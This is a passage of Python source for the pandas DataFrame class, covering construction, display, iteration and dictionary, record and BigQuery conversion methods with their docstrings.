from pandas.core.internals import (BlockManager,
create_block_manager_from_arrays,
create_block_manager_from_blocks)
from pandas.core.series import Series
from pandas.core.categorical import Categorical
import pandas.core.algorithms as algorithms
from pandas.compat import (range, map, zip, lrange, lmap, lzip, StringIO, u,
OrderedDict, raise_with_traceback)
from pandas import compat
from pandas.compat import PY36
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (Appender, Substitution,
rewrite_axis_style_signature)
from pandas.util._validators import (validate_bool_kwarg,
validate_axis_style_args)
from pandas.core.indexes.period import PeriodIndex
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
from pandas.core import accessor
import pandas.core.common as com
import pandas.core.nanops as nanops
import pandas.core.ops as ops
import pandas.io.formats.format as fmt
import pandas.io.formats.console as console
from pandas.io.formats.printing import pprint_thing
import pandas.plotting._core as gfx
from pandas._libs import lib, algos as libalgos
from pandas.core.config import get_option
# ---------------------------------------------------------------------
# Docstring templates
_shared_doc_kwargs = dict(
axes='index, columns', klass='DataFrame',
axes_single_arg="{0 or 'index', 1 or 'columns'}",
optional_by="""
by : str or list of str
Name or list of names which refer to the axis items.""",
versionadded_to_excel='',
optional_labels="""labels : array-like, optional
New labels / index to conform the axis specified by 'axis' to.""",
optional_axis="""axis : int or str, optional
Axis to target. Can be either the axis name ('index', 'columns')
or number (0, 1).""",
)
_numeric_only_doc = """numeric_only : boolean, default None
Include only float, int, boolean data. If None, will attempt to use
everything, then use only numeric data
"""
_merge_doc = """
Merge DataFrame objects by performing a database-style join operation by
columns or indexes.
If joining columns on columns, the DataFrame indexes *will be
ignored*. Otherwise if joining indexes on indexes or indexes on a column or
columns, the index will be passed on.
Parameters
----------%s
right : DataFrame
how : {'left', 'right', 'outer', 'inner'}, default 'inner'
* left: use only keys from left frame, similar to a SQL left outer join;
preserve key order
* right: use only keys from right frame, similar to a SQL right outer join;
preserve key order
* outer: use union of keys from both frames, similar to a SQL full outer
join; sort keys lexicographically
* inner: use intersection of keys from both frames, similar to a SQL inner
join; preserve the order of the left keys
on : label or list
Column or index level names to join on. These must be found in both
DataFrames. If `on` is None and not merging on indexes then this defaults
to the intersection of the columns in both DataFrames.
left_on : label or list, or array-like
Column or index level names to join on in the left DataFrame. Can also
be an array or list of arrays of the length of the left DataFrame.
These arrays are treated as if they are columns.
right_on : label or list, or array-like
Column or index level names to join on in the right DataFrame. Can also
be an array or list of arrays of the length of the right DataFrame.
These arrays are treated as if they are columns.
left_index : boolean, default False
Use the index from the left DataFrame as the join key(s). If it is a
MultiIndex, the number of keys in the other DataFrame (either the index
or a number of columns) must match the number of levels
right_index : boolean, default False
Use the index from the right DataFrame as the join key. Same caveats as
left_index
sort : boolean, default False
Sort the join keys lexicographically in the result DataFrame. If False,
the order of the join keys depends on the join type (how keyword)
suffixes : 2-length sequence (tuple, list, ...)
Suffix to apply to overlapping column names in the left and right
side, respectively
copy : boolean, default True
If False, do not copy data unnecessarily
indicator : boolean or string, default False
If True, adds a column to output DataFrame called "_merge" with
information on the source of each row.
If string, column with information on source of each row will be added to
output DataFrame, and column will be named value of string.
Information column is Categorical-type and takes on a value of "left_only"
for observations whose merge key only appears in 'left' DataFrame,
"right_only" for observations whose merge key only appears in 'right'
DataFrame, and "both" if the observation's merge key is found in both.
validate : string, default None
If specified, checks if merge is of specified type.
* "one_to_one" or "1:1": check if merge keys are unique in both
left and right datasets.
* "one_to_many" or "1:m": check if merge keys are unique in left
dataset.
* "many_to_one" or "m:1": check if merge keys are unique in right
dataset.
* "many_to_many" or "m:m": allowed, but does not result in checks.
.. versionadded:: 0.21.0
Notes
-----
Support for specifying index levels as the `on`, `left_on`, and
`right_on` parameters was added in version 0.23.0
Examples
--------
>>> A >>> B
lkey value rkey value
0 foo 1 0 foo 5
1 bar 2 1 bar 6
2 baz 3 2 qux 7
3 foo 4 3 bar 8
>>> A.merge(B, left_on='lkey', right_on='rkey', how='outer')
lkey value_x rkey value_y
0 foo 1 foo 5
1 foo 4 foo 5
2 bar 2 bar 6
3 bar 2 bar 8
4 baz 3 NaN NaN
5 NaN NaN qux 7
Returns
-------
merged : DataFrame
The output type will the be same as 'left', if it is a subclass
of DataFrame.
See also
--------
merge_ordered
merge_asof
"""
# -----------------------------------------------------------------------
# DataFrame class
class DataFrame(NDFrame):
""" Two-dimensional size-mutable, potentially heterogeneous tabular data
structure with labeled axes (rows and columns). Arithmetic operations
align on both row and column labels. Can be thought of as a dict-like
container for Series objects. The primary pandas data structure
Parameters
----------
data : numpy ndarray (structured or homogeneous), dict, or DataFrame
Dict can contain Series, arrays, constants, or list-like objects
index : Index or array-like
Index to use for resulting frame. Will default to np.arange(n) if
no indexing information part of input data and no index provided
columns : Index or array-like
Column labels to use for resulting frame. Will default to
np.arange(n) if no column labels are provided
dtype : dtype, default None
Data type to force. Only a single dtype is allowed. If None, infer
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
Examples
--------
Constructing DataFrame from a dictionary.
>>> d = {'col1': [1, 2], 'col2': [3, 4]}
>>> df = pd.DataFrame(data=d)
>>> df
col1 col2
0 1 3
1 2 4
Notice that the inferred dtype is int64.
>>> df.dtypes
col1 int64
col2 int64
dtype: object
To enforce a single dtype:
>>> df = pd.DataFrame(data=d, dtype=np.int8)
>>> df.dtypes
col1 int8
col2 int8
dtype: object
Constructing DataFrame from numpy ndarray:
>>> df2 = pd.DataFrame(np.random.randint(low=0, high=10, size=(5, 5)),
... columns=['a', 'b', 'c', 'd', 'e'])
>>> df2
a b c d e
0 2 8 8 3 4
1 4 2 9 0 9
2 1 0 7 8 0
3 5 1 7 1 3
4 6 0 2 4 2
See also
--------
DataFrame.from_records : constructor from tuples, also record arrays
DataFrame.from_dict : from dicts of Series, arrays, or dicts
DataFrame.from_items : from sequence of (key, value) pairs
pandas.read_csv, pandas.read_table, pandas.read_clipboard
"""
@property
def _constructor(self):
return DataFrame
_constructor_sliced = Series
_deprecations = NDFrame._deprecations | frozenset(
['sortlevel', 'get_value', 'set_value', 'from_csv'])
@property
def _constructor_expanddim(self):
from pandas.core.panel import Panel
return Panel
def __init__(self, data=None, index=None, columns=None, dtype=None,
copy=False):
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
if isinstance(data, DataFrame):
data = data._data
if isinstance(data, BlockManager):
mgr = self._init_mgr(data, axes=dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif isinstance(data, dict):
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, ma.MaskedArray):
import numpy.ma.mrecords as mrecords
# masked recarray
if isinstance(data, mrecords.MaskedRecords):
mgr = _masked_rec_array_to_mgr(data, index, columns, dtype,
copy)
# a masked array
else:
mask = ma.getmaskarray(data)
if mask.any():
data, fill_value = maybe_upcast(data, copy=True)
data[mask] = fill_value
else:
data = data.copy()
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
elif isinstance(data, (np.ndarray, Series, Index)):
if data.dtype.names:
data_columns = list(data.dtype.names)
data = {k: data[k] for k in data_columns}
if columns is None:
columns = data_columns
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif getattr(data, 'name', None) is not None:
mgr = self._init_dict({data.name: data}, index, columns,
dtype=dtype)
else:
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
elif isinstance(data, (list, types.GeneratorType)):
if isinstance(data, types.GeneratorType):
data = list(data)
if len(data) > 0:
if is_list_like(data[0]) and getattr(data[0], 'ndim', 1) == 1:
if is_named_tuple(data[0]) and columns is None:
columns = data[0]._fields
arrays, columns = _to_arrays(data, columns, dtype=dtype)
columns = _ensure_index(columns)
# set the index
if index is None:
if isinstance(data[0], Series):
index = _get_names_from_index(data)
elif isinstance(data[0], Categorical):
index = _default_index(len(data[0]))
else:
index = _default_index(len(data))
mgr = _arrays_to_mgr(arrays, columns, index, columns,
dtype=dtype)
else:
mgr = self._init_ndarray(data, index, columns, dtype=dtype,
copy=copy)
else:
mgr = self._init_dict({}, index, columns, dtype=dtype)
elif isinstance(data, collections.Iterator):
raise TypeError("data argument can't be an iterator")
else:
try:
arr = np.array(data, dtype=dtype, copy=copy)
except (ValueError, TypeError) as e:
exc = TypeError('DataFrame constructor called with '
'incompatible data and dtype: %s' % e)
raise_with_traceback(exc)
if arr.ndim == 0 and index is not None and columns is not None:
values = cast_scalar_to_array((len(index), len(columns)),
data, dtype=dtype)
mgr = self._init_ndarray(values, index, columns,
dtype=values.dtype, copy=False)
else:
raise ValueError('DataFrame constructor not properly called!')
NDFrame.__init__(self, mgr, fastpath=True)
def _init_dict(self, data, index, columns, dtype=None):
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
if columns is not None:
columns = _ensure_index(columns)
# GH10856
# raise ValueError if only scalars in dict
if index is None:
extract_index(list(data.values()))
# prefilter if columns passed
data = {k: v for k, v in compat.iteritems(data) if k in columns}
if index is None:
index = extract_index(list(data.values()))
else:
index = _ensure_index(index)
arrays = []
data_names = []
for k in columns:
if k not in data:
# no obvious "empty" int column
if dtype is not None and issubclass(dtype.type,
np.integer):
continue
if dtype is None:
# 1783
v = np.empty(len(index), dtype=object)
elif np.issubdtype(dtype, np.flexible):
v = np.empty(len(index), dtype=object)
else:
v = np.empty(len(index), dtype=dtype)
v.fill(np.nan)
else:
v = data[k]
data_names.append(k)
arrays.append(v)
else:
keys = list(data.keys())
if not isinstance(data, OrderedDict):
keys = _try_sort(keys)
columns = data_names = Index(keys)
arrays = [data[k] for k in keys]
return _arrays_to_mgr(arrays, data_names, index, columns, dtype=dtype)
def _init_ndarray(self, values, index, columns, dtype=None, copy=False):
# input must be a ndarray, list, Series, index
if isinstance(values, Series):
if columns is None:
if values.name is not None:
columns = [values.name]
if index is None:
index = values.index
else:
values = values.reindex(index)
# zero len case (GH #2234)
if not len(values) and columns is not None and len(columns):
values = np.empty((0, 1), dtype=object)
# helper to create the axes as indexes
def _get_axes(N, K, index=index, columns=columns):
# return axes or defaults
if index is None:
index = _default_index(N)
else:
index = _ensure_index(index)
if columns is None:
columns = _default_index(K)
else:
columns = _ensure_index(columns)
return index, columns
# we could have a categorical type passed or coerced to 'category'
# recast this to an _arrays_to_mgr
if (is_categorical_dtype(getattr(values, 'dtype', None)) or
is_categorical_dtype(dtype)):
if not hasattr(values, 'dtype'):
values = _prep_ndarray(values, copy=copy)
values = values.ravel()
elif copy:
values = values.copy()
index, columns = _get_axes(len(values), 1)
return _arrays_to_mgr([values], columns, index, columns,
dtype=dtype)
elif is_datetimetz(values):
return self._init_dict({0: values}, index, columns, dtype=dtype)
# by definition an array here
# the dtypes will be coerced to a single dtype
values = _prep_ndarray(values, copy=copy)
if dtype is not None:
if not is_dtype_equal(values.dtype, dtype):
try:
values = values.astype(dtype)
except Exception as orig:
e = ValueError("failed to cast to '%s' (Exception was: %s)"
% (dtype, orig))
raise_with_traceback(e)
index, columns = _get_axes(*values.shape)
values = values.T
# if we don't have a dtype specified, then try to convert objects
# on the entire block; this is to convert if we have datetimelike's
# embedded in an object type
if dtype is None and is_object_dtype(values):
values = maybe_infer_to_datetimelike(values)
return create_block_manager_from_blocks([values], [columns, index])
@property
def axes(self):
"""
Return a list with the row axis labels and column axis labels as the
only members. They are returned in that order.
"""
return [self.index, self.columns]
@property
def shape(self):
"""
Return a tuple representing the dimensionality of the DataFrame.
"""
return len(self.index), len(self.columns)
def _repr_fits_vertical_(self):
"""
Check length against max_rows.
"""
max_rows = get_option("display.max_rows")
return len(self) <= max_rows
def _repr_fits_horizontal_(self, ignore_width=False):
"""
Check if full repr fits in horizontal boundaries imposed by the display
options width and max_columns. In case off non-interactive session, no
boundaries apply.
ignore_width is here so ipnb+HTML output can behave the way
users expect. display.max_columns remains in effect.
GH3541, GH3573
"""
width, height = console.get_console_size()
max_columns = get_option("display.max_columns")
nb_columns = len(self.columns)
# exceed max columns
if ((max_columns and nb_columns > max_columns) or
((not ignore_width) and width and nb_columns > (width // 2))):
return False
# used by repr_html under IPython notebook or scripts ignore terminal
# dims
if ignore_width or not com.in_interactive_session():
return True
if (get_option('display.width') is not None or
com.in_ipython_frontend()):
# check at least the column row for excessive width
max_rows = 1
else:
max_rows = get_option("display.max_rows")
# when auto-detecting, so width=None and not in ipython front end
# check whether repr fits horizontal by actually checking
# the width of the rendered repr
buf = StringIO()
# only care about the stuff we'll actually print out
# and to_string on entire frame may be expensive
d = self
if not (max_rows is None): # unlimited rows
# min of two, where one may be None
d = d.iloc[:min(max_rows, len(d))]
else:
return True
d.to_string(buf=buf)
value = buf.getvalue()
repr_width = max(len(l) for l in value.split('\n'))
return repr_width < width
def _info_repr(self):
"""True if the repr should show the info view."""
info_repr_option = (get_option("display.large_repr") == "info")
return info_repr_option and not (self._repr_fits_horizontal_() and
self._repr_fits_vertical_())
def __unicode__(self):
"""
Return a string representation for a particular DataFrame
Invoked by unicode(df) in py2 only. Yields a Unicode String in both
py2/py3.
"""
buf = StringIO(u(""))
if self._info_repr():
self.info(buf=buf)
return buf.getvalue()
max_rows = get_option("display.max_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
if get_option("display.expand_frame_repr"):
width, _ = console.get_console_size()
else:
width = None
self.to_string(buf=buf, max_rows=max_rows, max_cols=max_cols,
line_width=width, show_dimensions=show_dimensions)
return buf.getvalue()
def _repr_html_(self):
"""
Return a html representation for a particular DataFrame.
Mainly for IPython notebook.
"""
# qtconsole doesn't report its line width, and also
# behaves badly when outputting an HTML table
# that doesn't fit the window, so disable it.
# XXX: In IPython 3.x and above, the Qt console will not attempt to
# display HTML, so this check can be removed when support for
# IPython 2.x is no longer needed.
if com.in_qtconsole():
# 'HTML output is disabled in QtConsole'
return None
if self._info_repr():
buf = StringIO(u(""))
self.info(buf=buf)
# need to escape the <class>, should be the first line.
val = buf.getvalue().replace('<', r'<', 1)
val = val.replace('>', r'>', 1)
return '<pre>' + val + '</pre>'
if get_option("display.notebook_repr_html"):
max_rows = get_option("display.max_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
return self.to_html(max_rows=max_rows, max_cols=max_cols,
show_dimensions=show_dimensions, notebook=True)
else:
return None
@property
def style(self):
"""
Property returning a Styler object containing methods for
building a styled HTML representation fo the DataFrame.
See Also
--------
pandas.io.formats.style.Styler
"""
from pandas.io.formats.style import Styler
return Styler(self)
def iteritems(self):
"""
Iterator over (column name, Series) pairs.
See also
--------
iterrows : Iterate over DataFrame rows as (index, Series) pairs.
itertuples : Iterate over DataFrame rows as namedtuples of the values.
"""
if self.columns.is_unique and hasattr(self, '_item_cache'):
for k in self.columns:
yield k, self._get_item_cache(k)
else:
for i, k in enumerate(self.columns):
yield k, self._ixs(i, axis=1)
def iterrows(self):
"""
Iterate over DataFrame rows as (index, Series) pairs.
Notes
-----
1. Because ``iterrows`` returns a Series for each row,
it does **not** preserve dtypes across the rows (dtypes are
preserved across columns for DataFrames). For example,
>>> df = pd.DataFrame([[1, 1.5]], columns=['int', 'float'])
>>> row = next(df.iterrows())[1]
>>> row
int 1.0
float 1.5
Name: 0, dtype: float64
>>> print(row['int'].dtype)
float64
>>> print(df['int'].dtype)
int64
To preserve dtypes while iterating over the rows, it is better
to use :meth:`itertuples` which returns namedtuples of the values
and which is generally faster than ``iterrows``.
2. You should **never modify** something you are iterating over.
This is not guaranteed to work in all cases. Depending on the
data types, the iterator returns a copy and not a view, and writing
to it will have no effect.
Returns
-------
it : generator
A generator that iterates over the rows of the frame.
See also
--------
itertuples : Iterate over DataFrame rows as namedtuples of the values.
iteritems : Iterate over (column name, Series) pairs.
"""
columns = self.columns
klass = self._constructor_sliced
for k, v in zip(self.index, self.values):
s = klass(v, index=columns, name=k)
yield k, s
def itertuples(self, index=True, name="Pandas"):
"""
Iterate over DataFrame rows as namedtuples, with index value as first
element of the tuple.
Parameters
----------
index : boolean, default True
If True, return the index as the first element of the tuple.
name : string, default "Pandas"
The name of the returned namedtuples or None to return regular
tuples.
Notes
-----
The column names will be renamed to positional names if they are
invalid Python identifiers, repeated, or start with an underscore.
With a large number of columns (>255), regular tuples are returned.
See also
--------
iterrows : Iterate over DataFrame rows as (index, Series) pairs.
iteritems : Iterate over (column name, Series) pairs.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [0.1, 0.2]},
index=['a', 'b'])
>>> df
col1 col2
a 1 0.1
b 2 0.2
>>> for row in df.itertuples():
... print(row)
...
Pandas(Index='a', col1=1, col2=0.10000000000000001)
Pandas(Index='b', col1=2, col2=0.20000000000000001)
"""
arrays = []
fields = []
if index:
arrays.append(self.index)
fields.append("Index")
# use integer indexing because of possible duplicate column names
arrays.extend(self.iloc[:, k] for k in range(len(self.columns)))
# Python 3 supports at most 255 arguments to constructor, and
# things get slow with this many fields in Python 2
if name is not None and len(self.columns) + index < 256:
# `rename` is unsupported in Python 2.6
try:
itertuple = collections.namedtuple(name,
fields + list(self.columns),
rename=True)
return map(itertuple._make, zip(*arrays))
except Exception:
pass
# fallback to regular tuples
return zip(*arrays)
items = iteritems
def __len__(self):
"""Returns length of info axis, but here we use the index """
return len(self.index)
def dot(self, other):
"""
Matrix multiplication with DataFrame or Series objects
Parameters
----------
other : DataFrame or Series
Returns
-------
dot_product : DataFrame or Series
"""
if isinstance(other, (Series, DataFrame)):
common = self.columns.union(other.index)
if (len(common) > len(self.columns) or
len(common) > len(other.index)):
raise ValueError('matrices are not aligned')
left = self.reindex(columns=common, copy=False)
right = other.reindex(index=common, copy=False)
lvals = left.values
rvals = right.values
else:
left = self
lvals = self.values
rvals = np.asarray(other)
if lvals.shape[1] != rvals.shape[0]:
raise ValueError('Dot product shape mismatch, %s vs %s' %
(lvals.shape, rvals.shape))
if isinstance(other, DataFrame):
return self._constructor(np.dot(lvals, rvals), index=left.index,
columns=other.columns)
elif isinstance(other, Series):
return Series(np.dot(lvals, rvals), index=left.index)
elif isinstance(rvals, (np.ndarray, Index)):
result = np.dot(lvals, rvals)
if result.ndim == 2:
return self._constructor(result, index=left.index)
else:
return Series(result, index=left.index)
else: # pragma: no cover
raise TypeError('unsupported type: %s' % type(other))
# ----------------------------------------------------------------------
# IO methods (to / from other formats)
@classmethod
def from_dict(cls, data, orient='columns', dtype=None):
"""
Construct DataFrame from dict of array-like or dicts
Parameters
----------
data : dict
{field : array-like} or {field : dict}
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the passed dict
should be the columns of the resulting DataFrame, pass 'columns'
(default). Otherwise if the keys should be rows, pass 'index'.
dtype : dtype, default None
Data type to force, otherwise infer
Returns
-------
DataFrame
"""
index, columns = None, None
orient = orient.lower()
if orient == 'index':
if len(data) > 0:
# TODO speed up Series case
if isinstance(list(data.values())[0], (Series, dict)):
data = _from_nested_dict(data)
else:
data, index = list(data.values()), list(data.keys())
elif orient != 'columns': # pragma: no cover
raise ValueError('only recognize index or columns for orient')
return cls(data, index=index, columns=columns, dtype=dtype)
def to_dict(self, orient='dict', into=dict):
"""Convert DataFrame to dictionary.
Parameters
----------
orient : str {'dict', 'list', 'series', 'split', 'records', 'index'}
Determines the type of the values of the dictionary.
- dict (default) : dict like {column -> {index -> value}}
- list : dict like {column -> [values]}
- series : dict like {column -> Series(values)}
- split : dict like
{index -> [index], columns -> [columns], data -> [values]}
- records : list like
[{column -> value}, ... , {column -> value}]
- index : dict like {index -> {column -> value}}
Abbreviations are allowed. `s` indicates `series` and `sp`
indicates `split`.
into : class, default dict
The collections.Mapping subclass used for all Mappings
in the return value. Can be the actual class or an empty
instance of the mapping type you want. If you want a
collections.defaultdict, you must pass it initialized.
.. versionadded:: 0.21.0
Returns
-------
result : collections.Mapping like {column -> {index -> value}}
Examples
--------
>>> df = pd.DataFrame(
{'col1': [1, 2], 'col2': [0.5, 0.75]}, index=['a', 'b'])
>>> df
col1 col2
a 1 0.1
b 2 0.2
>>> df.to_dict()
{'col1': {'a': 1, 'b': 2}, 'col2': {'a': 0.5, 'b': 0.75}}
You can specify the return orientation.
>>> df.to_dict('series')
{'col1': a 1
b 2
Name: col1, dtype: int64, 'col2': a 0.50
b 0.75
Name: col2, dtype: float64}
>>> df.to_dict('split')
{'columns': ['col1', 'col2'],
'data': [[1.0, 0.5], [2.0, 0.75]],
'index': ['a', 'b']}
>>> df.to_dict('records')
[{'col1': 1.0, 'col2': 0.5}, {'col1': 2.0, 'col2': 0.75}]
>>> df.to_dict('index')
{'a': {'col1': 1.0, 'col2': 0.5}, 'b': {'col1': 2.0, 'col2': 0.75}}
You can also specify the mapping type.
>>> from collections import OrderedDict, defaultdict
>>> df.to_dict(into=OrderedDict)
OrderedDict([('col1', OrderedDict([('a', 1), ('b', 2)])),
('col2', OrderedDict([('a', 0.5), ('b', 0.75)]))])
If you want a `defaultdict`, you need to initialize it:
>>> dd = defaultdict(list)
>>> df.to_dict('records', into=dd)
[defaultdict(<type 'list'>, {'col2': 0.5, 'col1': 1.0}),
defaultdict(<type 'list'>, {'col2': 0.75, 'col1': 2.0})]
"""
if not self.columns.is_unique:
warnings.warn("DataFrame columns are not unique, some "
"columns will be omitted.", UserWarning,
stacklevel=2)
# GH16122
into_c = standardize_mapping(into)
if orient.lower().startswith('d'):
return into_c(
(k, v.to_dict(into)) for k, v in compat.iteritems(self))
elif orient.lower().startswith('l'):
return into_c((k, v.tolist()) for k, v in compat.iteritems(self))
elif orient.lower().startswith('sp'):
return into_c((('index', self.index.tolist()),
('columns', self.columns.tolist()),
('data', lib.map_infer(self.values.ravel(),
_maybe_box_datetimelike)
.reshape(self.values.shape).tolist())))
elif orient.lower().startswith('s'):
return into_c((k, _maybe_box_datetimelike(v))
for k, v in compat.iteritems(self))
elif orient.lower().startswith('r'):
return [into_c((k, _maybe_box_datetimelike(v))
for k, v in zip(self.columns, np.atleast_1d(row)))
for row in self.values]
elif orient.lower().startswith('i'):
return into_c((k, v.to_dict(into)) for k, v in self.iterrows())
else:
raise ValueError("orient '%s' not understood" % orient)
def to_gbq(self, destination_table, project_id, chunksize=10000,
verbose=True, reauth=False, if_exists='fail', private_key=None):
"""Write a DataFrame to a Google BigQuery table.
The main method a user calls to export pandas DataFrame contents to
Google BigQuery table.
Google BigQuery API Client Library v2 for Python is used.
Documentation is available `here
<https://developers.google.com/api-client-library/python/apis/bigquery/v2>`__
Authentication to the Google BigQuery service is via OAuth 2.0.
- If "private_key" is not provided:
By default "application default credentials" are used.
If default application credentials are not found or are restrictive,
user account credentials are used. In this case, you will be asked to
grant permissions for product name 'pandas GBQ'.
- If "private_key" is provided:
Service account credentials will be used to authenticate.
Parameters
----------
dataframe : DataFrame
DataFrame to be written
destination_table : string
Name of table to be written, in the form 'dataset.tablename'
project_id : str
Google BigQuery Account project ID.
chunksize : int (default 10000)
Number of rows to be inserted in each chunk from the dataframe.
verbose : boolean (default True)
Show percentage complete
reauth : boolean (default False)
Force Google BigQuery to reauthenticate the user. This is useful
if multiple accounts are used.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
'fail': If table exists, do nothing.
'replace': If table exists, drop it, recreate it, and insert data.
'append': If table exists, insert data. Create if does not exist.
private_key : str (optional)
Service account private key in JSON format. Can be file path
or string contents. This is useful for remote server
authentication (eg. jupyter iPython notebook on remote host)
"""
from pandas.io import gbq
return gbq.to_gbq(self, destination_table, project_id=project_id,
chunksize=chunksize, verbose=verbose, reauth=reauth,
if_exists=if_exists, private_key=private_key)
@classmethod
def from_records(cls, data, index=None, exclude=None, columns=None,
coerce_float=False, nrows=None):
"""
Convert structured or record ndarray to DataFrame
Parameters
----------
data : ndarray (structured dtype), list of tuples, dict, or DataFrame
index : string, list of fields, array-like
Field of array to use as the index, alternately a specific set of
input labels to use
exclude : sequence, default None
Columns or fields to exclude
columns : sequence, default None
Column names to use. If the passed data do not have names
associated with them, this argument provides names for the
columns. Otherwise this argument indicates the order of the columns
in the result (any names not found in the data will become all-NA
columns)
coerce_float : boolean, default False
Attempt to convert values of non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets
Returns
-------
df : DataFrame
"""
# Make a copy of the input columns so we can modify it
if columns is not None:
columns = _ensure_index(columns)
if is_iterator(data):
if nrows == 0:
return cls()
try:
first_row = next(data)
except StopIteration:
return cls(index=index, columns=columns)
dtype = None
if hasattr(first_row, 'dtype') and first_row.dtype.names:
dtype = first_row.dtype
values = [first_row]
if nrows is None:
values += data
else:
values.extend(itertools.islice(data, nrows - 1))
if dtype is not None:
data = np.array(values, dtype=dtype)
else:
data = values
if isinstance(data, dict):
if columns is None:
columns = arr_columns = _ensure_index(sorted(data))
arrays = [data[k] for k in columns]
else:
arrays = []
arr_columns = []
for k, v in compat.iteritems(data):
if k in columns:
arr_columns.append(k)
arrays.append(v)
arrays, arr_columns = _reorder_arrays(arrays, arr_columns,
columns)
elif isinstance(data, (np.ndarray, DataFrame)):
arrays, columns = _to_arrays(data, columns)
if columns is not None:
columns = _ensure_index(columns)
arr_columns = columns
else:
arrays, arr_columns = _to_arrays(data, columns,
coerce_float=coerce_float)
arr_columns = _ensure_index(arr_columns)
if columns is not None:
columns = _ensure_index(columns)
else:
columns = arr_columns
if exclude is None:
exclude = set()
else:
exclude = set(exclude)
result_index = None
if index is not None:
if (isinstance(index, compat.string_types) or
not hasattr(index, "__iter__")):
i = columns.get_loc(index)
exclude.add(index)
if len(arrays) > 0:
result_index = Index(arrays[i], name=index)
else:
result_index = Index([], name=index)
else:
try:
to_remove = [arr_columns.get_loc(field) for field in index]
index_data = [arrays[i] for i in to_remove]
result_index = _ensure_index_from_sequences(index_data,
names=index)
exclude.update(index)
except Exception:
result_index = index
if any(exclude):
arr_exclude = [x for x in exclude if x in arr_columns]
to_remove = [arr_columns.get_loc(col) for col in arr_exclude]
arrays = [v for i, v in enumerate(arrays) if i not in to_remove]
arr_columns = arr_columns.drop(arr_exclude)
columns = columns.drop(exclude)
mgr = _arrays_to_mgr(arrays, arr_columns, result_index, columns)
return cls(mgr)
def to_records(self, index=True, convert_datetime64=True):
"""
Convert DataFrame to record array. Index will be put in the
'index' field of the record array if requested
Parameters
----------
index : boolean, default True
Include index in resulting record array, stored in 'index' field
convert_datetime64 : boolean, default True
Whether to convert the index to datetime.datetime if it is a
DatetimeIndex
Returns
-------
y : recarray
"""
if index:
if is_datetime64_any_dtype(self.index) and convert_datetime64:
ix_vals = [self.index.to_pydatetime()]
else:
if isinstance(self.index, MultiIndex):
# array of tuples to numpy cols. copy copy copy
ix_vals = lmap(np.array, zip(*self.index.values))
else:
ix_vals = [self.index.values]
arrays = ix_vals + [self[c].get_values() for c in self.columns]
count = 0
index_names = list(self.index.names)
if isinstance(self.index, MultiIndex):
for i, n in enumerate(index_names):
if n is None:
index_names[i] = 'level_%d' % count
count += 1
elif index_names[0] is None:
index_names = ['index']
names = (lmap(compat.text_type, index_names) +
lmap(compat.text_type, self.columns))
else:
arrays = [self[c].get_values() for c in self.columns]
names = lmap(compat.text_type, self.columns)
formats = [v.dtype for v in arrays]
return np.rec.fromarrays(
arrays,
dtype={'names': names, 'formats': formats}
)
@classmethod
def from_items(cls, items, columns=None, orient='columns'):
"""
Convert (key, value) pairs to DataFrame. The keys will be the axis
index (usually the columns, but depends on the specified
orientation). The values should be arrays or Series.
Parameters
----------
items : sequence of (key, value) pairs
Values should be arrays or Series.
columns : sequence of column labels, optional
Must be passed if orient='index'.
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the
input correspond to column labels, pass 'columns'
(default). Otherwise if the keys correspond to the index,
pass 'index'.
Returns
-------
frame : DataFrame
"""
keys, values = lzip(*items)
if orient == 'columns':
if columns is not None:
columns = _ensure_index(columns)
idict = dict(items)
if len(idict) < len(items):
if not columns.equals(_ensure_index(keys)):
raise ValueError('With non-unique item names, passed '
'columns must be identical')
arrays = values
else:
arrays = [idict[k] for k in columns if k in idict]
else:
columns = _ensure_index(keys)
arrays = values
# GH 17312
# Provide more informative error msg when scalar values passed
try:
return cls._from_arrays(arrays, columns, None)
except ValueError:
if not is_nested_list_like(values):
raise ValueError('The value in each (key, value) pair '
'must be an array, Series, or dict')
elif orient == 'index':
if columns is None:
raise TypeError("Must pass columns with orient='index'")
keys = _ensure_index(keys)
# GH 17312
# Provide more informative error msg when scalar values passed
try:
arr = np.array(values, dtype=object).T
data = [lib.maybe_convert_objects(v) for v in arr]
return cls._from_arrays(data, columns, keys)
except TypeError:
if not is_nested_list_like(values):
raise ValueError('The value in each (key, value) pair '
'must be an array, Series, or dict')
else: # pragma: no cover
raise ValueError("'orient' must be either 'columns' or 'index'")
@classmethod
def _from_arrays(cls, arrays, columns, index, dtype=None):
mgr = _arrays_to_mgr(arrays, columns, index, columns, dtype=dtype)
return cls(mgr)
@classmethod
def from_csv(cls, path, header=0, sep=',', index_col=0, parse_dates=True,
encoding=None, tupleize_cols=None,
infer_datetime_format=False):
"""
Read CSV file (DEPRECATED, please use :func:`pandas.read_csv`
instead).
It is preferable to use the more powerful :func:`pandas.read_csv`
for most general purposes, but ``from_csv`` makes for an easy
roundtrip to and from a file (the exact counterpart of
``to_csv``), especially with a DataFrame of time series data.
This method only differs from the preferred :func:`pandas.read_csv`
in some defaults:
- `index_col` is ``0`` instead of ``None`` (take first column as index
by default)
- `parse_dates` is ``True`` instead of ``False`` (try parsing the index
as datetime by default)
So a ``pd.DataFrame.from_csv(path)`` can be replaced by
``pd.read_csv(path, index_col=0, parse_dates=True)``.
Parameters
----------
path : string file path or file handle / StringIO
header : int, default 0
Row to use as header (skip prior rows)
sep : string, default ','
Field delimiter
index_col : int or sequence, default 0
Column to use for index. If a sequence is given, a MultiIndex
is used. Different default from read_table
parse_dates : boolean, default True
Parse dates. Different default from read_table
